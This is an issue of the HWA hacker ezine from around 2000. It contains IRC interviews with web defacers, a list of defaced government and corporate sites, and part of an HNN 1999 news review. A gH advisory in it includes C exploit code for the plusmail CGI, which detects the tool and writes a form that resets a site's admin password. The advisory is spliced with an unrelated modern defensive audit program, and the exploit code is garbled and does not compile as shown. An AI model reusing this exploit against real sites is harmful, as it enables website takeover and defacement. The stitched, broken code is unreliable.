thinks i know alot about NT and shit.. but i never claimed i was anything great.. i have your shit is safe from msadc > hehhe > :))) which is good.. coz that shit is too easy.. 
> heh > I ain't a shitty admin afterall > :))) no you're not heh > hehe > :)) if you ever need any rewted korean bawx's let me know ;) got plenty heh > :))))) > :P > Is there any1 on the scene that U trully admire !? hmm yeah.. i have a lot of respect for Erik B. > that's the dewd that sings with rakim !? !?! > :))) also peter Shipley no.. i meant.. bloodaxe eric bloodaxe > oh, ok and also Peter Shipley from dis.org > ooooohhh that dude's a mad coder also.. 1 more dude.. for sure.. > that is .... !? i have a lot (and i do mean a lot) of respect for aempirei aka.. ambient empire he's a good friend.. and a bad ass coder as well as well as XXyla.. (yes.. a chick).. she's bad ass when it comes to fones > aaight and another chick ;) named crow (she can code..) > any1 U hate !? not really.. > not hate > just don't like i don't really "hate" or dislike any 1 i accept every 1 for who they are no matter the skill level > kewl > CAn I ask a personal q !? as long as they're straight up with me.. i'm always straight up with them sure.. go ahead > U going on a party for New year's eve !? > :))) uhmm.. probably not > not ?!?! nah > why is that !? i dunno > well...ok > just don't get mad drunk > and try to hack www.fbi.gov i'd rather be with my ex-.. but since she doesn't want me any more.. > :( oh well heh probably sit around and deface shit > :P j/k > :))))) or.. maybe not.. ;) > :) who can tell > "US government says: Hackers give us a brake" > Will U givem a brake! ? hmm yeah i'll give 'em a break me breakin' my foot off up in dat ass heh.. seriously.. tho > :))) yeah.. i'll leave 'em alone > aaight coo > Ok > the editor is gonna kill me now > I'm way over the limit with this why's that? oh.. heh > Any shouts U wanna give what's their page again? uhmm.. sure.. > of the ezine !? > welcome.to/hwa.hax0r.news much luv to: xxyla, aempirei, cristyn, vghk, f0bic, flipz, and nostalg1c > aight > thanx for the interview bro > keep it real on show them what's hacking all about but.. 
u don't have to put that if u don't want to.. but if u do.. definitely to them.. ;) aight plan on it and thanks for your time as well.. ;) > peace out

-----------------------------------------/* end interview /*-----------------------------

defaced sites:

[99.10.27] NT [fuqrag] Commander, Helicopter Tactical Wing, U.S. Atlantic Fleet (eagle.chtwl.spear.navy.mil)
[99.10.27] NT [fuqrag] Naval Surface Warfare Center, Carderock Division (scotty.navsses.navy.mil)
[99.10.27] NT [fuqrag] Commander Submarine Force U.S. Pacific fleet (www.csp.navy.mil)
[99.10.27] NT [fuqrag] Defense Information School (www.dinfos.osd.mil)
[99.10.27] NT [fuqrag] Federal Mediation and Conciliation Service (www.fmcs.gov)
[99.10.27] NT [fuqrag] Marine Corps Base, Hawaii (www.mcbh.usmc.mil)
[99.10.27] NT [fuqrag] Naval Security Group Activity Pensacola (www.nsg.navy.mil)
[99.10.27] NT [fuqrag] U.S. International Trade Commission (www.usitc.gov)
[99.10.28] NT [fuqrag] Dairy Queen (www.dairyqueen.com)
[99.10.28] NT [fuqrag] U.S. Minerals Management Service (www.mms.gov)
[99.10.28] NT [fuqrag] TriStar Computers International (www.tristar.com)
[99.10.29] NT [fuqrag] U.S. Office of Personnel Management (apps.opm.gov)
[99.10.29] NT [fuqrag] #2 U.S. Minerals Management Service (www.mms.gov)
[99.10.30] NT [fuqrag] California State Assembly Democrats (democrats.assembly.ca.gov)
[99.10.30] NT [fuqrag] Domino Server for the Office of Civilian Radioactive Waste Management (domino1.rw.doe.gov)
[99.10.30] NT [fuqrag] Space Shuttle Flight Tracker, Johnson Space Center (flight.jsc.nasa.gov)
[99.10.31] NT [fuqrag] (ncr) DISA (dssg-web-srv.ncr.disa.mil)
[99.10.31] NT [fuqrag] City of Fresno Gov (gw.fresno.gov)
[99.11.02] NT [fuqrag] Defense Commissary Agency (www.deca.mil)
[99.11.02] NT [fuqrag] U.S. Navy Electronic Commerce Homepage (www.ec.navsup.navy.mil)
[99.11.03] NT [fuqrag] Naval Medical Research Institute (www.nmri.nnmc.navy.mil)
[99.11.06] NT [fuqrag] Office of Small & Disadvantaged Business Utilization, Department of Transportation (osdbuweb.dot.gov)
[99.11.11] NT [fuqrag] PWD Malaysia (corp.jkr.gov.my)
[99.11.11] NT [fuqrag] Ministère de l'Environnement et de l'Énergie de l'Ontario (ene.gov.on.ca)
[99.11.11] NT [fuqrag] Chinese Ministry of Foreign Affairs (fmprc.gov.cn)
[99.11.11] NT [fuqrag] Taipei Government (intra.taipei.gov.tw)
[99.11.12] NT [fuqrag] Belgium Ministry of Economic Affairs (mineco.fgov.be)
[99.11.12] NT [fuqrag] Supremo Tribunal Federal (www.stf.gov.br)
[99.11.12] NT [fuqrag] Shj Library, Saudi Arabia (shjlib.gov.ae)
[99.11.12] NT [fuqrag] Singapore Government Shopfront (shop.gov.sg)
[99.11.14] NT [fuqrag] Unreal Web site (www.unreal.com/index2.html)
[99.11.22] NT [fuqrag] IntelSat (www.intelsat.int)
[99.11.22] NT [fuqrag] #1 NATO Airborne Early Warning and Control (www.naewfc.nato.int)
[99.11.22] NT [fuqrag] Supreme Headquarters Allied Powers Europe (SHAPE) (www.shape.nato.int)
[99.11.23] NT [fuqrag] Atlantic Council of the United States (www.acus.org)
[99.11.23] NT [fuqrag] Council of Europe Convention (www.coe.fr)
[99.11.23] NT [fuqrag] John Romero's Ion Storm (www.ionstorm.com)
[99.11.23] NT [fuqrag] Canopus Corporation (www.justedit.com)
[99.11.24] NT [fuqrag] Hemp Cat (www.hempcat.com)
[99.11.25] NT [fuqrag] Asia-Pacific Economic Cooperation (www.apecsec.org.sg)
[99.11.25] NT [fuqrag] Kingston Technology Corp (www.kingston.com)

Total Defacements: 41 - defacement list provided by attrition.org

Slash is an HWA correspondent, email him at smuddo@yahoo.com
cc: your comments to cruciphux@dok.org

 @HWA

07.0 Interview with sSh member YTcracker Jan 10th 2000
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     HWA Exclusive. You may reproduce this if credit is given for the
     source, quote http://welcome.to/HWA.hax0r.news, an HNN affiliate.
ytcracker is a member and founder of the 'new' sSh 2000 hacking group (Sesame Street Hackers, formerly run by dap) and has defaced many websites in recent months you can see mirrors of his work on Attrition.org a site that archives web defacements. The IRC interview: Session Start: Mon Jan 10 12:07:23 2000 [12:07] yo So you up for an interview now? [12:07] hit it ok cool [12:07] *grammar mode on* *g* [12:07] leave the channel [12:07] go back [12:07] get ops ok [12:09] back to the task at hand [12:09] haha oky lets get some basic history, how old are you and how long have you been on the internet? you can refuse to answer any questions btw :) [12:09] i'm 17 and five months, been on the inet since i was six. do you code in any languages and do you take computer courses at school? or are you self taught? [12:10] i'm completely self-taught and i hate school [12:10] haha you've cracked a good many sites, do you use your own exploits or scripts from others? [12:11] i code in a load of languages but my strongest skills are probably in cpp and vb. [12:11] i use other peoples stuff mostly [12:11] msadc is probably what made me NoToRIOUs [12:11] hahah [12:11] i do know how to code in core x86 assembler would you consider yourself a 'Script Kiddie" then? [12:12] i wouldn't, no a cracker? [12:12] a defacer [12:12] well, former defacer [12:12] i don't even really take part in that much anymore when you were defacing, what was the main reason behind it? just because you could? or boredom? or fame? or some other reason(s)? [12:13] i wrote an article detailing my motives [12:13] i would argue it was a mix of a lot of thing [12:13] i didn't intend for the media to take any interest yes you did, It was on HNN but that was a while ago. [12:14] yea [12:14] hahahah [12:14] i gotta do my laundry ok wanna continue later? [12:14] haha no go ahead [12:14] i was reminding myself k I was wondering about sSh, what plans do you hold for the 'group'? 
[12:15] i don't really know anymore [12:15] i've been writing a lot of code for pure-security what kind of code? [12:15] exploits and automation tasks [12:15] i wrote a spammer for mosthated [12:15] hahahah hehe how is your relationship with mosthated? what did you think of his 20/20 appearance? [12:16] mosthated is really cool [12:16] i think that it's the media's editors that made him look like a hoodlum [12:17] more or less many people seem to dis him simply coz he's been on tv and such, I guess its cool to dis 'famous' ppl in the scene. [12:17] i think it's a combination of jealousy agreed [12:17] and envy plus it makes you look cool to dis someone that is well known. [12:17] "Freedom of the press is limited to those who own one." [12:18] hahahah perhaps yeah I like that quote [12:18] i will agree that what i did requires no *real* skill [12:18] then again ./wow doesn't either is there anything you'd like to say to 'aspiring crackers' out there? since many newbies seem to think defacing is something to aspire towards [12:19] i'd like to say it isn't really worth it [12:19] for a while, it is so you change your mind from your article on HNN? [12:19] it's like graffiti very much [12:19] no no [12:19] let me explain ok [12:19] i go out and paint still [12:19] bombing is something that i like to do [12:20] but it is illegal [12:20] the ends DO justify the means [12:20] but only if you are fighting for something worth fighting for [12:20] not [12:20] "i luv my girl, peaz" [12:20] you can tell her that [12:20] you can't tell the world the plight of the chechyans [12:20] or tell the world about the government's weak security Have you ever been raided or fear that you may be? I heard rumours but they were unconfirmed [12:23] nah [12:23] i ducked it successfully [12:23] i hope [12:23] haha were you contacted by any law enforcement officials or security personnel? or did they not 'find' you? [12:24] didn't find me heh whats your opinnion on Kevin Mitnick? 
(nearly done btw) :) [12:26] one sec k [12:27] on the fone [12:27] heheh ok feds? lol [12:27] hahah no ;) [12:27] angry fone marketers fucking hate them [12:27] yea they are dumb [12:27] i think that kevin mitnick is being unjustly held [12:28] i mean [12:28] murders don't spend that much time what about internet criminals in general?, the sentences being handed down to people like Zyklon, with restrictions on computer use after the jail term is up etc? do you think its fair? [12:29] for the most part people fear what they don't understand [12:29] therefore [12:29] computer crime is probably the most unjustly punished crime the fedz (etc) need to be more educated. [12:29] these kids deserve to be behind a sesk [12:29] desk* [12:29] not bars [12:29] yea totally nod [12:29] clinton started a brilliant initiative [12:29] that i hope other politicians carry on which was this? [12:30] as far as educating young minds [12:30] the $91 million internship program with the government [12:30] headed here in colorado springs ah ok any last words you'd like to impart? or greets? [12:31] not really ok [12:31] just keep things pure [12:31] stop the shit talking [12:31] and focus on unity want to plug any sites? [12:32] www.felons.org/son aiight, thanks for your time, and stay free! ;-) [12:32] you too Session Close: Mon Jan 10 12:33:01 2000 @HWA 08.0 Interview: Mosthated gH (Global Hell) Jan 10th 2000 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HWA Exclusive. You may reproduce this if credit is given for the source, quote http://welcome.to/HWA.hax0r.news, an HNN affiliate. mosthated is member/founder of the hacker group (gH) Global Hell and was recently featured on a spot on the television editorial show 20/20. 
ABC Coverage:
http://www.abcnews.go.com/onair/2020/2020_991220_hackers_feature.html

Squaring Off With ‘Global Hell’
20/20 Looks at FBI Efforts to Combat Teenage Hackers

Patrick Gregory is one of the founders of Global Hell, an online gang of several dozen of the most active and notorious teenage computer hackers on the Net. Gregory says he has stopped hacking. (ABCNEWS.com)

ABCNEWS.com
Dec. 20 — Young cyber whizzes with knowledge to infiltrate the most secure computer systems in the world are growing in numbers and ability. Faced with growing security threats to government and commercial Web sites, the Justice Department is no longer sitting by idly.

On 20/20 Monday, Brian Ross takes a look at some members of “Global Hell,” an online gang of several dozen of the most active and notorious teenage computer hackers on the Net, and the FBI’s efforts to delete these hackers from cyberspace.

Global Hell members have disrupted such Web locations as the Department of Defense and the telephone company Ameritech, and they have forced the White House Internet access to be closed down for two days.

“I don’t understand why they look at us as such bad people,” 19-year-old Patrick Gregory says. Gregory is one of Global Hell’s founders.

Government Wary of Hackers

Hackers, now with their own conventions and magazines, see themselves as artists or pranksters at worst. But the federal government says there are plenty of reasons to fear the damage that could be caused by hackers.

“If you deface a Web site of a company that is making $18 million dollars a day, you are committing a pretty serious crime,” says Assistant U.S. Attorney Matthew Yarbrough, a member of the federal government’s Cyber Crimes Task Force. “We can’t treat this problem as if it’s just kids.
Everyone has to start taking this very seriously.” Eric Burns is the 19-year-old who infiltrated the White House computer system and briefly posted the Global Hell’s logo on the site. Burns’ action forced the Secret Service to cut off White House access to the Internet for two days. Burns, of Shoreline, Wash., pleaded guilty in federal court last month. He was sentenced to 15 months in prison and ordered by a judge not to touch a computer for three years. Hacking Easier Another reason to fear these juvenile cyber surfers is that potentially damaging software is getting easier to handle. With viruses available for downloading from the Web, extensive computer language knowledge is no longer needed. Because of the growing threat of cyberterrorism, the federal government has committed more than a billion dollars to go after computer hackers. “If they penetrate a computer system with intent to defraud, or the intent to sabotage it or, or to steal proprietary information, yes, that’s a federal crime,” assistant special agent in charge of the Dallas FBI office, Bob Garrity, tells 20/20. “It is a serious crime and it’s a growing crime.” But the hackers say they are protecting government property by exposing its vulnerabilities. “This war between hackers and the FBI has been going on for years. … It’s not going to stop any time soon,” says Gregory, who says he has stopped hacking. -=- The IRC interview: Session Start: Mon Jan 10 15:50:41 2000 [15:50] DONE. ok ready to go now then? [15:51] Sure. ok first off you don't have to answer questions if you don't want to. Ok here goes... how old are you now and how long have you been on the internet? [15:53] I am 19 years of age, been online since about 10 or 11 years old. did you take any computer courses at school or would you consider yourself self-taught? [15:53] Self taught. how did you 'get into' computers? [15:54] My family was computer literate, my mother did alot of typing, i got interested that way. 
you've defaced websites in the past, what was your reason for doing it? or reason(s) [15:55] None, it was stupid, i would never do it again. so it was for fun? or fame? or just for peer recognition? [15:55] supposively helping with security, it did nothing but get ourselves in trouble. [15:55] recognition/fame/help i guess would sum it up. what group(s) have you been a member of in the past? [15:56] gH [15:56] =] :) what is your current view of 'hacking groups' ? [15:57] Pathetic, skillLess, dead in a few weeks. do you think they are mostly "script kiddies" ? [15:59] Yes. [15:59] maybe you should read my advisory ok you were recently profiled on 20/20, what do you think of the reaction from 'scene' people regarding this and what do you think of how it was presented? [16:02] I have no comment. ok you run pure-security.net which is a well put together site for security related material do you hope to make a career in the security field? [16:05] Yes, hopefully with a large organization to track down people like these kids who break into stuff for fun. ok i'll cut this short now then, do you have any final words you'd like to say? [16:06] Everything i wished to express is in the vulnerability. ok thanks for your time and take care [16:07] =] tnx [16:07] i held in my anger. short and sweet why anger? [16:07] i hate script kids. ah [16:07] as you can see in our release. yeh I just read it [16:07] script kid ethics caused us to get fucked. [16:08] if were would have done what we are doing now, 3 years ago. [16:08] we would be millionaires. [16:08] starting security businesses, offering services. I can understand that [16:08] yet, we ./hacked websites. [16:08] dumb dumb dumb. its a trap many people get caught up in the allure of the forbidden [16:09] yeah [16:09] me and gH climbed out. [16:09] now we are to piss down inside and shut it closed. the site is looking pretty good, are you getting a lot of hits? who designed it? 
[16:11] dishwater [16:11] we are doing a millinium design. [16:11] finally get a more professional look. [16:11] plus i started www.pure-children.net whats that about? [16:12] Educating children and families on? [16:12] "Educate your Future" [16:12] Computer related issues. cool [16:12] internet, help, anti child porn, ect. is that up now? ah just checked, it, coming soon. who's behind that? just yourself or do you have help? [16:13] myself right now. you're going to be busy in the future then :) any other plans? like are you working now or are you continuiing your education? it seems you can't get far these days without those bits of papers (certs etc) [16:16] neither. [16:16] i'm learning by myself. thats commendable if you ever feel like writing any articles or diatribes etc consider sending them to me and i'll put them in the zine. Just something to keep in mind. :) have you read any of our stuff? [16:19] yeah, i seen my name and group used in it before. heh oky i'll let you go now then, once again thanks for your time dude take it easy [16:22] no problem.
Session Close: Mon Jan 10 16:22:35 2000

@HWA

09.0 Mosthated/gH advisory Jan 10th 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Submitted by Mosthated, gH

/*
[gH-plus.c]
title: [gH plusmail vulnerability]
author: ytcracker of gH [phed@felons.org]
comments: plusmail is an extremely popular cgi-based administration tool that allows you to take control of your website with a graphical control panel interface. the password file, however, is set with permissions rw enabled, therefore granting the authority to change the password whenever's clever. the following code will detect the vulnerability and generate the required html to exploit.
found by: herf@ghettophreaks.org
shouts: seven one nine. all of gH.
*/

/*
[gH Security Advisory]

Date: 1-10-2000
written by: mosthated of gH (most@pure-security.net)
vulnerable: Remote Vulnerability in Plusmail. So far, any environment running Plusmail.

report: Noticed plusmail running on multiple operating systems. The vulnerability lies in the web based tool, which now that is easily exploited, gives you "ADVANCED CONTROL" of a target website. Below is the code by ytcracker of gH, which demonstrates how easy it is to generate the html code which is executed by your web browser to compromise the target host. We have noticed this Plus Mail program is widely used, but have yet to succeed in finding the main site for Plusmail to acknowledge the developers of the remote vulnerability. Most likely this will be ripped out during the online trading, because of script kids not liking this factual addition, but nevertheless, it will be expressed.

This exploit was written to acknowledge security weaknesses, but in no way promotes web page defacements. If you further use this program to gain access to anything not normally accessible by yourself, meaning you script kids, then you are subject to be prosecuted and even get 10 years in prison. Is it honestly worth it to compile this program and randomly ./hack sites and deface them with this half way automated program to put your nick & group on it? The answer is NO.

gh/global hell.. Heard of us?? Seen us on TV?? Read about us?? Most likely.. We've changed and gained knowledge from the experience....Been there done that.. The IT professionals didn't believe that a group like this could completely go legit, the media figured we would retaliate against the fbi and the world was scared by misleading media articles and television specials about how we are terrorists and destructive teens. I ask the world now, who is helping who? Did the media find this vulnerability? Did the stereotypist who label us as "cyber gang members" find this vulnerability and allow networks around the world to be patched before us so called "destructive hackers" gained access to them? Answer yet again, NO, we did, not you who falsely claim to be helping with security.

Your defacements don't help anything, we thought it did before as well, now we realized that it does nothing positive. You stereotypist know nothing about gH, yet can write articles, you're wrong. You people think you know so much about hackers. You know nothing, what you think you know, is wrong. What you don't know about us, the information is right under your nose, yet you still can't put your finger on it. There are 2 sides to the so called "hacking scene", you people should realize there will always be a good and a bad side to most matters. Don't exploit the fact that you don't know anything about the good side, so you initialize a media free for all on the bad side of what you have no idea about. Just face the real fact, our knowledge could be a great help to all, why not accept us as normal people, not based on some untrue off the wall assumptions.

If you use programs like this to deface sites, think before you use this one, because we have been through the childish fights online and expressed our feelings, we were still where we started, from square 1 and would not have gone any farther, until we realized that what we were doing was stupid, pathetic, futureless and illegal. Choose your path wisely, either stop the script kiddie bullshit or get your door kicked in, you decide.

fix: Move/Rename the plusmail directory, sorta how you get around RDS.

Respect: cDc, l0pht, ADM, w00w00, www.ussrback.com (UssrLabs), all of gH and the people/groups/agents/officers/admins/families/children/presidents parents/senior citizens who gave gH a hard time about the childish things we did. Respect well worth it on a level finally reached to succeed helping with security & pushed to be legit and turn our lives around.
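The advisory above attributes the flaw to a password file left writable under the CGI directory and gives moving or renaming the plusmail directory as the fix. The C program below is an added example, not part of the gH advisory or of plusmail: it audits a CGI tree for files writable beyond their owner and for an entry still named plusmail, then repeats the audit after the corrected settings. The function names, the temp-directory layout, `passwd.sample`, `panel.cgi` and `pm-renamed` are constructed for this example.

```c
// Added example (not gH's or plusmail's code): audit a CGI tree for files
// writable beyond their owner and for an entry still named "plusmail".
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

// Counters: group/other-writable files, default-name entries, unreadable paths.
struct audit_result { int loose_files, plusmail_hits, errors; };

// True when someone other than the owner may write the file.
static int is_loosely_writable(mode_t mode)
{
    return (mode & (S_IWGRP | S_IWOTH)) != 0;
}

// Walk dir recursively, adding to *res. lstat() does not follow symlinks,
// so a link planted in the tree cannot steer the walk outside it.
void audit_cgi_tree(const char *dir, struct audit_result *res, int verbose)
{
    DIR *d = opendir(dir);
    struct dirent *e;
    if (d == NULL) { res->errors++; return; }
    while ((e = readdir(d)) != NULL) {
        char path[1024];
        struct stat st;
        int n;
        if (!strcmp(e->d_name, ".") || !strcmp(e->d_name, "..")) continue;
        n = snprintf(path, sizeof path, "%s/%s", dir, e->d_name);
        if (n < 0 || (size_t)n >= sizeof path || lstat(path, &st) != 0) { res->errors++; continue; }
        if (strcmp(e->d_name, "plusmail") == 0) {
            res->plusmail_hits++;
            if (verbose) printf("default name in place: %s\n", path);
        }
        if (S_ISREG(st.st_mode) && is_loosely_writable(st.st_mode)) {
            res->loose_files++;
            if (verbose) printf("mode %04o: %s\n", (unsigned)(st.st_mode & 07777), path);
        }
        if (S_ISDIR(st.st_mode)) audit_cgi_tree(path, res, verbose);
    }
    closedir(d);
}

// Create a file, then chmod() it so the umask cannot hide the mode bits.
static int write_file(const char *path, mode_t mode)
{
    FILE *f = fopen(path, "w");
    if (f == NULL) return -1;
    fputs("constructed sample\n", f);
    fclose(f);
    return chmod(path, mode);
}

// Build a constructed sample tree in a fresh temp directory; every name
// except "cgi-bin" and "plusmail" is made up for this example.
int build_sample_tree(char *root, size_t len)
{
    char p[1024];
    const char *tmp = getenv("TMPDIR");
    snprintf(root, len, "%s/cgi-audit-XXXXXX", tmp ? tmp : "/tmp");
    if (mkdtemp(root) == NULL) return -1;
    snprintf(p, sizeof p, "%s/cgi-bin", root);
    if (mkdir(p, 0755) != 0) return -1;
    snprintf(p, sizeof p, "%s/cgi-bin/plusmail", root);
    if (mkdir(p, 0755) != 0) return -1;
    snprintf(p, sizeof p, "%s/cgi-bin/plusmail/passwd.sample", root);
    if (write_file(p, 0666) != 0) return -1;      // the weak setting
    snprintf(p, sizeof p, "%s/cgi-bin/plusmail/panel.cgi", root);
    return write_file(p, 0755);                   // writable by owner only
}

// Corrected settings: owner-only password file, then the advisory's fix of
// moving the directory away from its default name.
int apply_fixes(const char *root)
{
    char from[1024], to[1024];
    snprintf(from, sizeof from, "%s/cgi-bin/plusmail/passwd.sample", root);
    if (chmod(from, 0600) != 0) return -1;
    snprintf(from, sizeof from, "%s/cgi-bin/plusmail", root);
    snprintf(to, sizeof to, "%s/cgi-bin/pm-renamed", root);
    return rename(from, to);
}

int main(void)
{
    char root[512];
    struct audit_result before = {0, 0, 0}, after = {0, 0, 0};
    if (build_sample_tree(root, sizeof root) != 0) return 1;
    audit_cgi_tree(root, &before, 1);
    if (apply_fixes(root) != 0) return 1;
    audit_cgi_tree(root, &after, 1);
    printf("loose files %d -> %d, default-name entries %d -> %d\n",
           before.loose_files, after.loose_files, before.plusmail_hits, after.plusmail_hits);
    return 0;
}
```

On a real server the same walk would start at the web root's CGI directory instead of the constructed sample tree.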
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

int main(int argc, char *argv[])
{
    int sock;
    unsigned long vulnip;
    struct in_addr addr;
    struct sockaddr_in sin;
    struct hostent *he;
    char *detect;
    char buffer[1024];
    /* request used to test whether the plusmail cgi is present */
    char plusvuln[]="GET /cgi-bin/plusmail HTTP/1.0\n\n";
    char htmI[]="[gH plusmail exploit]

username:
password:
retype password:

pure-security networks

";
    FILE *html;

    printf("\n [gH plusmail exploit] [ytcracker] [phed@felons.org]\n");
    if(argc<2) {
        printf(" usage: %s [vulnerable website]\n\n",argv[0]);
        exit(0);
    }
    if ((he=gethostbyname(argv[1])) == NULL) {
        herror("gethostbyname");
        exit(0);
    }
    vulnip=inet_addr(argv[1]);
    vulnip=ntohl(vulnip);
    sock=socket(AF_INET, SOCK_STREAM, 0);
    bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
    sin.sin_family=AF_INET;
    sin.sin_port=htons(80);
    if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) {
        perror("connect");
    }
    send(sock, plusvuln,strlen(plusvuln),0);
    recv(sock, buffer, sizeof(buffer),0);
    /* a 404 anywhere in the reply is read as "plusmail not installed" */
    detect = strstr(buffer,"404");
    close(sock);
    if( detect != NULL) {
        printf(" vulnerabilty not detected.\n");
        exit(0);
    }
    else
        printf(" vulnerability detected. generating html...\n");
    /* write the form to plus.html and open it in lynx */
    html=fopen("plus.html","w+b");
    fprintf(html,"%s",htmI);
    fprintf(html,"%s",argv[1]);
    fprintf(html,"%s",htmII);
    fclose(html);
    printf(" spawning lynx...\n");
    system("lynx plus.html");
    return 0;
}

@HWA

10.0 HNN's 1999 Year In Review 12/26/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue
1999 has been a whirlwind year for the underground community and HNN. We have searched through the archives and came up with what we thought were the biggest news stories we reported on in 1999. Since HNN tends to cover very different stuff from the mainstream our list is a little different from everyone else's. If you missed a day or two of HNN over the last year you should take a look at our top ten (really it is eleven) news stories of 1999.

1999 Year In Review
http://www.hackernews.com/special/1999/99topstories.html

HNN: The Year in Review 1999 Page 1

Nineteen Ninety Nine was an exciting year that saw explosive growth for HNN and our ever continuing battle against Fear, Uncertainty, and Doubt (FUD). While some of our engagements with FUD have been successful, like the alleged moving of a British satellite, other battles like the numerous virus scares, were not.
1999 also saw some major events unfold in the underground community, from the exposure of Se7en as a fraud, to the removal and resurrection of Packet Storm Security, and the debacle of MTV. At the close of the year Kevin Mitnick is awaiting release while others take his place behind bars. Throughout 1999 HNN was the place on the net to get up to date breaking news on these stories.

These top eleven stories of 1999 are not presented in any particular order.

LoU China-Iraq War

On December 29, 1998 the underground group Legions of the Underground declared an all out cyber warfare on information infrastructure of China and Iraq. They cited severe civil rights abuses by the governments of both countries as well as the sentencing to death of two bank robbers in China and the production of weapons of mass destruction by Iraq as the reasons for their declaration.

By January 5th, 1999 a group known as spl0it and a group based in Poland said that they would assist LoU in their cyber warfare efforts.

On January 6th, 1999 Legions of the Underground released a statement contradicting their earlier statements that claimed that they never had destructive intentions and blamed the media for letting this get out of hand.

The retraction by LoU came too late. On the next day January 7th, 1999 an International Hacker Coalition including groups such as cDc, L0pht, CCC, 2600, Phrack, !HISPAHACK and others released a joint statement condemning the Legions of the Underground and their Declaration of War.

By January 8, 1999 LoU was reeling from the overwhelming support of the joint condemnation of LoU's actions and released additional retractions of their declaration of war.

On January 13, 1999 the Legions of the Underground told Wired magazine that the original press conference was a fake and that the people present during the press conference were spoofed. There is no evidence to support this but there is none to deny it either.
Finally Optiklenz, a member of LoU, releases a statement on the view of what happened from the LoU perspective.

LoU-China-Iraq War Histogram - Chronological Listing of Events
http://www.hackernews.com/special/1999/louwar/louhist.html
HNN Archive for December 29, 1998
http://www.hackernews.com/arch.html?122998
Transcript of IRC Press Conference with LoU
http://www.hackernews.com/special/1999/louwar/louirc.html
LoU Declaration of War
http://www.hackernews.com/special/1999/louwar/lou1.html
HNN Archive for January 6, 1999
http://www.hackernews.com/arch.html?010699
International Hacker Coalition Joint Statement
http://www.hackernews.com/special/1999/louwar/jointstat.html
LoU Retraction of War Declaration
http://www.hackernews.com/special/1999/louwar/loustat.html
Optiklenz Statement
http://www.hackernews.com/special/1999/louwar/legspeak.html

Hackers Move British Military Satellite

This is one battle with FUD that we like to claim that we won. On March 1, 1999 The Sunday Business published a story that was later picked up by the Reuters wire service, that a British military satellite had been taken over by cyber attackers and was being held for ransom. The story itself lacked any sort of verifiable information and HNN called it into question immediately. By the next day spokespeople from the British Ministry of Defense flat out denied that such a thing was even possible. HNN editor Space Rogue was a guest on the radio show "Off the Hook" to discuss this incident. Both ZDNet and MSNBC ran stories covering this non event crediting HNN for calling the story suspect. Bob Sullivan of MSNBC went so far as to label HNN "The Voice of Reason".
HNN Archive for March 01, 1999
http://www.hackernews.com/arch.html?030199
HNN Archive for March 02, 1999
http://www.hackernews.com/arch.html?030299
Original Sunday Business Article
http://www.hackernews.com/special/1999/sundaybusiness.html
Security Analysis of Satellite Command and Control Uplinks - Buffer Overflow Article by Brian Oblivion
http://www.hackernews.com/bufferoverflow/99/satcom.html
MSNBC
http://msnbc.com/news/245713.asp
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2217730,00.html
Off The Hook - March 02, 1999 episode
http://www.2600.com/offthehook/rafiles99/030299.ram

Se7en Exposed

An article written by Steve Silberman and published by Wired exposed Se7en (Christian Valor) and his single handed cracker crusade against pedophiles as a complete sham. Se7en succeeded in creating a massive media hack as articles of his infamous exploits were published in Forbes, MSNBC, LA Times, Newsday and others over several months. Only one of the journalists that we know, Adam Penenberg, that had been duped by Se7en actually admitted his mistake and published a public apology.

HNN Archive for February 8, 1999
http://www.hackernews.com/arch.html?020899
Attrition.org - Evidence used against Se7en
http://www.hackernews.com/arch.html?020899
Wired
http://www.wired.com/news/culture/0,1284,17789,00.html
Open letter from Adam Penenberg
http://www.hackernews.com/special/1999/penenbergletter.html

HNN: The Year in Review Page 2

John Vranesevich Shuts Down Packet Storm Security

Probably the biggest story of 1999 was the actions of John Vranesevich, founder and administrator of AntiOnline, who was instrumental in getting the extremely popular web site Packet Storm Security shut down. As far as can be determined John Vranesevich discovered a private directory on Packet Storm that contained potentially libelous material about him and his family. Mr.
Vranesevich did not contact the site administrator directly but instead sent an email to the administrators at Harvard University asking that the objectionable material be removed. Harvard responded by unceremoniously pulling the plug on the whole site.

Once word of how and why Packet Storm had gone down a public outcry ensued. Mailing lists were started, people started an attempt to mirror the site, Ken Williams received numerous offers to host the site and Mr. Vranesevich became the whipping boy du jour.

Because Mr. Williams was unable to access his web site, which was his senior project, he was forced to drop out of school. He later sold the web site to Kroll O' Gara and took a position at a major internet security company.

HNN Archive for July 1, 1999
http://www.hackernews.com/arch.html?070199
HNN Archive for July 2, 1999
http://www.hackernews.com/arch.html?070299
Attrition.org - Examples of the supposedly libelous materials posted to Packet Storm
http://www.attrition.org/negation/image/vran.jpg
Ken Williams Statement
http://www.hackernews.com/special/1999/pss/williams.html
AntiOnline - John Vranesevich's Defense
http://www.antionline.com/archives/editorials/packetstorm.html
Letter from Harvard
http://www.hackernews.com/special/1999/pss/harvard.html
Ken Williams Response to Harvard
http://www.hackernews.com/special/1999/pss/kenresponce.html
Letter From Bronc Buster - Regarding the actions of Mr. Vranesevich
http://www.hackernews.com/special/1999/pss/broncjplet.html
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2287456,00.html

HNN Pulls Massive April Fools Joke

It was meant as a simple joke, a simple April Fools Day prank, a reason to smile or to laugh. It turned into one of the biggest stories in the underground for 1999. At midnight EST on April 1, 1999 the main Hacker News web page was updated with what appeared as a web defacement. The page contained all the required elements of a defacement, poor spelling, hax0r speak, shout outs, etc...
Many, many, bought the defacement hook line and sinker, HNN administrators even got personal phone calls to their homes at 8am to inform them of the defacement. Remember, even as recently as April web defacements were a relatively rare thing, not occurring by the dozens like they are today.

